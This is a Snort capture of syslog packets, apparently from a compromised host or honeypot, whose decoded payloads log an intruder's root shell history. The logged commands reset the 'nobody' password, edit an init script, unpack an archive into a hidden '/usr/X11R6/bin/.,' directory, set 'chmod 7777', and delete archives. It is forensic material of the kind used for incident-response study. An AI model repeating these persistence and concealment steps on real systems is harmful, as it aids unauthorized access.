=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:44:50.108872 0.0.0.0:2451 -> 0.0.0.0:514 TCP TTL:48 TOS:0x0 ID:17910 IpLen:20 DgmLen:60 DF ******S* Seq: 0x896434DF Ack: 0x0 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 237685474 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:44:50.133586 0.0.0.0:514 -> 0.0.0.0:2451 TCP TTL:64 TOS:0x0 ID:2611 IpLen:20 DgmLen:60 DF ***A**S* Seq: 0x8EBB9398 Ack: 0x896434E0 Win: 0x7D78 TcpLen: 40 TCP Options (5) => MSS: 1460 SackOK TS: 29931024 237685474 NOP TCP Options => WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:44:50.191972 0.0.0.0:2451 -> 0.0.0.0:514 TCP TTL:48 TOS:0x0 ID:17921 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x896434E0 Ack: 0x8EBB9399 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 237685484 29931024 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:44:50.193145 0.0.0.0:2451 -> 0.0.0.0:514 TCP TTL:48 TOS:0x0 ID:17922 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x896434E0 Ack: 0x8EBB9399 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 237685484 29931024 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:44:50.195491 0.0.0.0:514 -> 0.0.0.0:2451 TCP TTL:64 TOS:0x0 ID:2621 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x8EBB9399 Ack: 0x896434E1 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 29931029 237685484 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:44:50.972333 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:2750 IpLen:20 DgmLen:91 Len: 71 3C 33 37 3E 72 73 68 64 5B 38 36 38 33 5D 3A 20 <37>rshd[8683]: 43 6F 6E 6E 65 63 74 69 6F 6E 20 66 72 6F 6D 20 Connection from 32 30 37 2E 33 35 2E 32 35 31 2E 31 37 32 20 6F 207.35.251.172 o 6E 20 69 6C 6C 65 67 61 6C 20 70 6F 72 74 0A n illegal port. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:44:50.975528 0.0.0.0:514 -> 0.0.0.0:2451 TCP TTL:64 TOS:0x0 ID:2751 IpLen:20 DgmLen:52 DF ***A***F Seq: 0x8EBB9399 Ack: 0x896434E1 Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 29931085 237685484 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:44:50.982540 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:2752 IpLen:20 DgmLen:68 Len: 48 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 38 36 38 33 3A 20 65 78 69 74 20 73 pid 8683: exit s 74 61 74 75 73 20 31 0A tatus 1. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:44:51.046424 0.0.0.0:2451 -> 0.0.0.0:514 TCP TTL:48 TOS:0x0 ID:18078 IpLen:20 DgmLen:52 DF ***A**** Seq: 0x896434E1 Ack: 0x8EBB939A Win: 0x7D78 TcpLen: 32 TCP Options (3) => NOP NOP TS: 237685567 29931085 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:44:54.747308 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:3410 IpLen:20 DgmLen:71 Len: 51 3C 33 30 3E 74 65 6C 6E 65 74 64 5B 38 36 38 34 <30>telnetd[8684 5D 3A 20 74 74 6C 6F 6F 70 3A 20 70 65 65 72 20 ]: ttloop: peer 64 69 65 64 3A 20 45 4F 46 20 0A died: EOF . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:44:54.760415 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:3412 IpLen:20 DgmLen:68 Len: 48 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 38 36 38 34 3A 20 65 78 69 74 20 73 pid 8684: exit s 74 61 74 75 73 20 31 0A tatus 1. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:45:13.632185 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:6355 IpLen:20 DgmLen:63 Len: 43 3C 39 34 3E 66 74 70 64 5B 38 36 38 35 5D 3A 20 <94>ftpd[8685]: 46 54 50 20 73 65 73 73 69 6F 6E 20 63 6C 6F 73 FTP session clos 65 64 0A ed. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:45:16.348693 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:6800 IpLen:20 DgmLen:94 Len: 74 3C 33 37 3E 72 6C 6F 67 69 6E 64 5B 38 36 38 36 <37>rlogind[8686 5D 3A 20 43 6F 6E 6E 65 63 74 69 6F 6E 20 66 72 ]: Connection fr 6F 6D 20 32 30 37 2E 33 35 2E 32 35 31 2E 31 37 om 207.35.251.17 32 20 6F 6E 20 69 6C 6C 65 67 61 6C 20 70 6F 72 2 on illegal por 74 0A t. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:45:16.389568 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:6826 IpLen:20 DgmLen:68 Len: 48 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 38 36 38 36 3A 20 65 78 69 74 20 73 pid 8686: exit s 74 61 74 75 73 20 31 0A tatus 1. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:46:03.395935 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:12646 IpLen:20 DgmLen:84 Len: 64 3C 32 37 3E 66 69 6E 67 65 72 64 5B 38 36 39 30 <27>fingerd[8690 5D 3A 20 43 6C 69 65 6E 74 20 68 75 6E 67 20 75 ]: Client hung u 70 20 2D 20 70 72 6F 62 61 62 6C 65 20 70 6F 72 p - probable por 74 2D 73 63 61 6E 20 0A t-scan . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:46:03.406662 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:12649 IpLen:20 DgmLen:68 Len: 48 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 38 36 39 30 3A 20 65 78 69 74 20 73 pid 8690: exit s 74 61 74 75 73 20 31 0A tatus 1. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:47:17.093310 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:12682 IpLen:20 DgmLen:71 Len: 51 3C 31 37 34 3E 62 61 73 68 3A 20 48 49 53 54 4F <174>bash: HISTO 52 59 3A 20 50 49 44 3D 38 36 36 32 20 55 49 44 RY: PID=8662 UID 3D 30 20 2E 2F 47 6F 20 32 34 0A =0 ./Go 24. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:52:18.847107 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:12882 IpLen:20 DgmLen:64 Len: 44 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 77 0A 0 w. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:52:26.282344 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:12896 IpLen:20 DgmLen:69 Len: 49 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 77 68 6F 61 6D 69 0A 0 whoami. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:54:55.165873 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:12903 IpLen:20 DgmLen:81 Len: 61 3C 33 38 3E 50 41 4D 5F 70 77 64 62 5B 38 36 36 <38>PAM_pwdb[866 31 5D 3A 20 28 73 75 29 20 73 65 73 73 69 6F 6E 1]: (su) session 20 63 6C 6F 73 65 64 20 66 6F 72 20 75 73 65 72 closed for user 20 64 6E 73 0A dns. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:55:00.544559 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:12907 IpLen:20 DgmLen:87 Len: 67 3C 33 38 3E 50 41 4D 5F 70 77 64 62 5B 38 36 34 <38>PAM_pwdb[864 35 5D 3A 20 28 6C 6F 67 69 6E 29 20 73 65 73 73 5]: (login) sess 69 6F 6E 20 63 6C 6F 73 65 64 20 66 6F 72 20 75 ion closed for u 73 65 72 20 6E 6F 62 6F 64 79 0A ser nobody. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:55:01.711311 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:12913 IpLen:20 DgmLen:68 Len: 48 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 38 36 34 34 3A 20 65 78 69 74 20 73 pid 8644: exit s 74 61 74 75 73 20 31 0A tatus 1. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:55:06.620777 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:12937 IpLen:20 DgmLen:78 Len: 58 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 63 64 20 2F 64 65 76 2F 72 64 2F 73 64 63 0 cd /dev/rd/sdc 30 0A 0. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:55:08.509045 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:12941 IpLen:20 DgmLen:65 Len: 45 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 6C 73 0A 0 ls. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:55:18.561679 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:12953 IpLen:20 DgmLen:77 Len: 57 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 72 6D 20 5A 65 72 30 2E 74 61 72 2E 67 7A 0 rm Zer0.tar.gz 0A . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:55:21.207608 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:12961 IpLen:20 DgmLen:65 Len: 45 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 6C 73 0A 0 ls. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:55:54.291751 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13026 IpLen:20 DgmLen:84 Len: 64 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 61 6C 69 61 73 20 6C 73 3D 27 6C 73 20 2D 0 alias ls='ls - 2D 63 6F 6C 6F 72 27 0A -color'. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:55:56.748349 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13030 IpLen:20 DgmLen:65 Len: 45 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 6C 73 0A 0 ls. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:58:23.243036 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13069 IpLen:20 DgmLen:65 Len: 45 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 6C 73 0A 0 ls. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:58:23.243807 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13070 IpLen:20 DgmLen:76 Len: 56 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 70 61 73 73 77 64 20 6E 6F 62 6F 64 79 0A 0 passwd nobody. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-01:58:40.942483 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13092 IpLen:20 DgmLen:95 Len: 75 3C 33 38 3E 50 41 4D 5F 70 77 64 62 5B 39 34 30 <38>PAM_pwdb[940 36 5D 3A 20 70 61 73 73 77 6F 72 64 20 66 6F 72 6]: password for 20 28 6E 6F 62 6F 64 79 2F 39 39 29 20 63 68 61 (nobody/99) cha 6E 67 65 64 20 62 79 20 28 28 6E 75 6C 6C 29 2F nged by ((null)/ 30 29 0A 0). =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:00:02.773268 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13122 IpLen:20 DgmLen:96 Len: 76 3C 33 38 3E 50 41 4D 5F 70 77 64 62 5B 39 34 30 <38>PAM_pwdb[940 39 5D 3A 20 28 6C 6F 67 69 6E 29 20 73 65 73 73 9]: (login) sess 69 6F 6E 20 6F 70 65 6E 65 64 20 66 6F 72 20 75 ion opened for u 73 65 72 20 75 75 63 70 20 62 79 20 28 75 69 64 ser uucp by (uid 3D 30 29 0A =0). 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:00:28.867924 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13126 IpLen:20 DgmLen:85 Len: 65 3C 33 38 3E 50 41 4D 5F 70 77 64 62 5B 39 34 30 <38>PAM_pwdb[940 39 5D 3A 20 28 6C 6F 67 69 6E 29 20 73 65 73 73 9]: (login) sess 69 6F 6E 20 63 6C 6F 73 65 64 20 66 6F 72 20 75 ion closed for u 73 65 72 20 75 75 63 70 0A ser uucp. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:00:28.899975 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13128 IpLen:20 DgmLen:68 Len: 48 3C 32 38 3E 69 6E 65 74 64 5B 34 34 39 5D 3A 20 <28>inetd[449]: 70 69 64 20 39 34 30 38 3A 20 65 78 69 74 20 73 pid 9408: exit s 74 61 74 75 73 20 31 0A tatus 1. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:01:22.769990 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13163 IpLen:20 DgmLen:81 Len: 61 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 70 69 6E 67 20 77 77 77 2E 79 61 68 6F 6F 0 ping www.yahoo 2E 63 6F 6D 0A .com. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:02:02.741510 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13197 IpLen:20 DgmLen:91 Len: 71 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 70 69 63 6F 20 2F 65 74 63 2F 72 63 2E 64 0 pico /etc/rc.d 2F 72 63 33 2E 64 2F 53 35 30 69 6E 65 74 0A /rc3.d/S50inet. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:02:18.309588 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13237 IpLen:20 DgmLen:65 Len: 45 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 6C 73 0A 0 ls. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:02:42.974762 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13288 IpLen:20 DgmLen:101 Len: 81 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 6D 76 20 63 6F 70 79 2E 74 61 72 2E 67 7A 0 mv copy.tar.gz 20 2F 75 73 72 2F 58 31 31 52 36 2F 62 69 6E 2F /usr/X11R6/bin/ 2E 2C 2F 63 6F 70 79 2F 0A .,/copy/. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:02:56.827304 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13299 IpLen:20 DgmLen:89 Len: 69 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 63 64 20 2F 75 73 72 2F 58 31 31 52 36 2F 0 cd /usr/X11R6/ 62 69 6E 2F 2E 2C 2F 63 6F 70 79 2F 0A bin/.,/copy/. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:03:07.875878 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13337 IpLen:20 DgmLen:81 Len: 61 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 6D 76 20 63 6F 70 79 2E 74 61 72 2E 67 7A 0 mv copy.tar.gz 20 2E 2E 2F 0A ../. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:03:09.522064 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13345 IpLen:20 DgmLen:65 Len: 45 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 6C 73 0A 0 ls. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:03:14.609409 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13359 IpLen:20 DgmLen:68 Len: 48 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 63 64 20 2E 2E 0A 0 cd ... 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:03:20.255901 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13379 IpLen:20 DgmLen:83 Len: 63 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 74 61 72 20 7A 78 76 66 20 63 6F 70 79 2E 0 tar zxvf copy. 74 61 72 2E 67 7A 0A tar.gz. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:04:03.777359 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13426 IpLen:20 DgmLen:75 Len: 55 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 63 68 6D 6F 64 20 37 37 37 37 20 2A 0A 0 chmod 7777 *. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:04:05.901249 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13434 IpLen:20 DgmLen:65 Len: 45 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 6C 73 0A 0 ls. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:04:18.792918 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13474 IpLen:20 DgmLen:77 Len: 57 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 72 6D 20 63 6F 70 79 2E 74 61 72 2E 67 7A 0 rm copy.tar.gz 0A . =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:04:21.369867 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13488 IpLen:20 DgmLen:70 Len: 50 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 63 64 20 63 6F 70 79 0A 0 cd copy. 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:04:25.912240 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13499 IpLen:20 DgmLen:75 Len: 55 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 63 68 6D 6F 64 20 37 37 37 37 20 2A 0A 0 chmod 7777 *. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:04:28.350149 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13505 IpLen:20 DgmLen:65 Len: 45 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 33 38 32 20 55 49 44 3D Y: PID=9382 UID= 30 20 6C 73 0A 0 ls. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:07:33.792486 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13546 IpLen:20 DgmLen:71 Len: 51 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 34 34 30 20 55 49 44 3D Y: PID=9440 UID= 30 20 75 6E 61 6D 65 20 2D 72 0A 0 uname -r. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 09/17-02:07:58.732757 0.0.0.0:514 -> 0.0.0.0:514 UDP TTL:64 TOS:0x0 ID:13577 IpLen:20 DgmLen:69 Len: 49 3C 31 37 34 3E 2D 73 68 3A 20 48 49 53 54 4F 52 <174>-sh: HISTOR 59 3A 20 50 49 44 3D 39 34 34 30 20 55 49 44 3D Y: PID=9440 UID= 30 20 70 73 74 72 65 65 0A 0 pstree. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ =============================================================================== Snort processed 92 packets. 
